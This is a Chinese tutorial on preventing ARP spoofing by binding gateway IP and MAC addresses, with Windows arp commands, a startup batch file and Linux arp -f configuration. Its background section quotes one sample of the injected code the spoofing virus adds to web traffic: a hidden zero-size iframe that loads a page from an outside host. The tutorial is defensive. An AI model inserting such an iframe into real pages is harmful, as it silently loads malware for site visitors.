ARP綁定網(wǎng)關(guān)及批處理

一.WINDOWS下綁定ARP綁定網(wǎng)關(guān)

步驟一：

在能正常上網(wǎng)時， 進(jìn)入MS-DOS窗口， 輸入命令：arp －a， 查看網(wǎng)關(guān)的IP對應(yīng)的正確MAC地址， 并將其記錄下來。

注意：如果已經(jīng)不能上網(wǎng)， 則先運行一次命令arp －d將arp緩存中的內(nèi)容刪空， 計算機(jī)可暫時恢復(fù)上網(wǎng)（攻擊如果不停止的話）。 一旦能上網(wǎng)就立即將網(wǎng)絡(luò)斷掉（禁用網(wǎng)卡或拔掉網(wǎng)線）， 再運行arp －a。

步驟二：

步驟二：

如果計算機(jī)已經(jīng)有網(wǎng)關(guān)的正確MAC地址， 在不能上網(wǎng)只需手工將網(wǎng)關(guān)IP和正確的MAC地址綁定， 即可確保計算機(jī)不再被欺騙攻擊。

要想手工綁定， 可在MS-DOS窗口下運行以下命令：

arp －s 網(wǎng)關(guān)IP 網(wǎng)關(guān)MAC

例如：假設(shè)計算機(jī)所處網(wǎng)段的網(wǎng)關(guān)為192.168.1.1， 本機(jī)地址為192.168.1.5， 在計算機(jī)上運行arp －a后輸出如下：

Cocuments and Settings>arp -a

Interface:192.168.1.5 --- 0x2

Internet Address Physical Address Type

192.168.1.1 00-01-02-03-04-05 dynamic

其中， 00-01-02-03-04-05就是網(wǎng)關(guān)192.168.1.1對應(yīng)的MAC地址， 類型是動態(tài)（dynamic）的， 因此是可被改變的。

被攻擊后， 再用該命令查看， 就會發(fā)現(xiàn)該MAC已經(jīng)被替換成攻擊機(jī)器的MAC。 如果希望能找出攻擊機(jī)器， 徹底根除攻擊， 可以在此時將該MAC記錄下來， 為以后查找該攻擊的機(jī)器做準(zhǔn)備。

手工綁定的命令為：

arp －s 192.168.1.1 00-01-02-03-04-05

綁定完， 可再用arp －a查看arp緩存：

Cocuments and Settings>arp -a

Interface: 192.168.1.5 --- 0x2

Internet Address Physical Address Type

192.168.1.1 00-01-02-03-04-05 static

這時， 類型變?yōu)殪o態(tài)（static）， 就不會再受攻擊影響了。

但是， 需要說明的是， 手工綁定在計算機(jī)關(guān)機(jī)重啟后就會失效， 需要再次重新綁定。 所以， 要徹底根除攻擊， 只有找出網(wǎng)段內(nèi)被病毒感染的計算機(jī)， 把病毒殺掉， 才算是真正解決問題。 作批處理文件

在客戶端做對網(wǎng)關(guān)的arp綁定， 具體操作步驟如下：

步驟一：

查找本網(wǎng)段的網(wǎng)關(guān)地址， 比如192．168．1．1， 以下以此網(wǎng)關(guān)為例。 在正常上網(wǎng)時， “開始→運行→cmd→確定”， 輸入：arp －a， 點回車， 查看網(wǎng)關(guān)對應(yīng)的Physical Address。

比如：網(wǎng)關(guān)192.168.1.1 對應(yīng)00－01－02－03－04－05。

步驟二：

編寫一個批處理文件rarp.bat， 內(nèi)容如下：

@echo off

arp －d

arp -s 192.168.1.1 00－01－02－03－04－05

保存為：rarp.bat。

步驟三：

運行批處理文件將這個批處理文件拖到“Windows→開始→程序→啟動”中， 如果需要立即生效， 請運行此文件。 二. Linux下綁定IP和MAC地址， 防止ARP欺騙一、應(yīng)用背景

由于最近網(wǎng)上新出現(xiàn)一種ARP欺騙病毒， 主要表現(xiàn)為：

中病毒的機(jī)器不僅影響自身， 同時也會影響同網(wǎng)段的其它機(jī)器， 將其它機(jī)器的HTTP數(shù)據(jù)包里加入病毒代碼。 代碼例子如：

<html><iframe src=http://www2.89382.cn/wm/css.htm width=0 height=0></iframe>

這種病毒危害非常大！即使你機(jī)器的安全性做得很好， 可是沒辦法保證同網(wǎng)段的其它機(jī)器安全沒有問題！

解決辦法：在網(wǎng)關(guān)和本機(jī)上雙向綁定IP和MAC地址， 以防止ARP欺騙。

二、約定

1、網(wǎng)關(guān)上已經(jīng)對下面所帶的機(jī)器作了綁定。 網(wǎng)關(guān)IP：192.168.1.1　MAC：00:02:B3:38:08:62

2、要進(jìn)行綁定的Linux主機(jī)IP：192.168.1.2　MAC：00:04:61:9A:8D:B2

三、綁定步驟

1、先使用arp和arp -a查看一下當(dāng)前ARP緩存列表

[root@ftpsvr ~]# arp

Address                  HWtype  HWaddress           Flags Mask            Iface

192.168.1.234            ether   00:04:61:AE:11:2B   C                     eth0

192.168.1.145            ether   00:13:20:E9:11:04   C                     eth0

192.168.1.1              ether   00:02:B3:38:08:62   C                     eth0

說明：

Address：主機(jī)的IP地址

Hwtype：主機(jī)的硬件類型

Hwaddress：主機(jī)的硬件地址

Flags Mask：記錄標(biāo)志， "C"表示arp高速緩存中的條目， "M"表示靜態(tài)的arp條目。

[root@ftpsvr ~]# arp -a

? (192.168.1.234) at 00:04:61:AE:11:2B [ether] on eth0

? (192.168.1.1) at 00:16:76:22:23:86 [ether] on eth0

2、新建一個靜態(tài)的mac-->ip對應(yīng)表文件：ip-mac， 將要綁定的IP和MAC地下寫入此文件， 格式為 ip mac。

[root@ftpsvr ~]# echo '192.168.1.1 00:02:B3:38:08:62 ' > /etc/ip-mac

[root@ftpsvr ~]# more /etc/ip-mac

192.168.1.1 00:02:B3:38:08:62

3、設(shè)置開機(jī)自動綁定

[root@ftpsvr ~]# echo 'arp -f /etc/ip-mac ' >> /etc/rc.d/rc.local

4、手動執(zhí)行一下綁定

[root@ftpsvr ~]# arp -f /etc/ip-mac

5、確認(rèn)綁定是否成功

[root@ftpsvr ~]# arp

Address                  HWtype  HWaddress           Flags Mask            Iface

192.168.0.205            ether   00:02:B3:A7:85:48   C                     eth0

192.168.1.234            ether   00:04:61:AE:11:2B   C                     eth0

192.168.1.1              ether   00:02:B3:38:08:62   CM                    eth0

[root@ftpsvr ~]# arp -a

? (192.168.0.205) at 00:02:B3:A7:85:48 [ether] on eth0

? (192.168.1.234) at 00:04:61:AE:11:2B [ether] on eth0

? (192.168.1.1) at 00:02:B3:38:08:62 [ether] PERM on eth0

從綁定前后的ARP緩存列表中， 可以看到網(wǎng)關(guān)（192.168.1.1）的記錄標(biāo)志已經(jīng)改變， 說明綁定成功。

四、添加信任的Windows主機(jī)（192.168.1.10）

1、Linux主機(jī)（192.168.1.2）上操作

[root@ftpsvr ~]# echo '192.168.1.10 00:04:61:AE:09:14' >> /etc/ip-mac

[root@ftpsvr ~]# arp -f /etc/ip-mac

2、Windows主機(jī)（192.168.1.10）上操作

1）清除ARP緩存

C:Documents and SettingsAdministrator>arp -d

2）綁定Linux主機(jī)的IP和MAC地址

C:Documents and SettingsAdministrator>arp -s 192.168.1.2 00-04-61-9A-8D-B2

你可以將上面2個步驟寫在一個BAT（批處理）文件中， 這樣做的好處是， 今后如果要增加其它機(jī)器的綁定， 只需維護(hù)這個文件就可以了。 例：

@echo off  

arp -d  

arp -s 192.168.1.2 00-04-61-9A-8D-B2

exit 

注意：Linux和Widows上的MAC地址格式不同。 Linux表示為：AA:AA:AA:AA:AA:AA， Windows表示為：AA-AA-AA-AA-AA-AA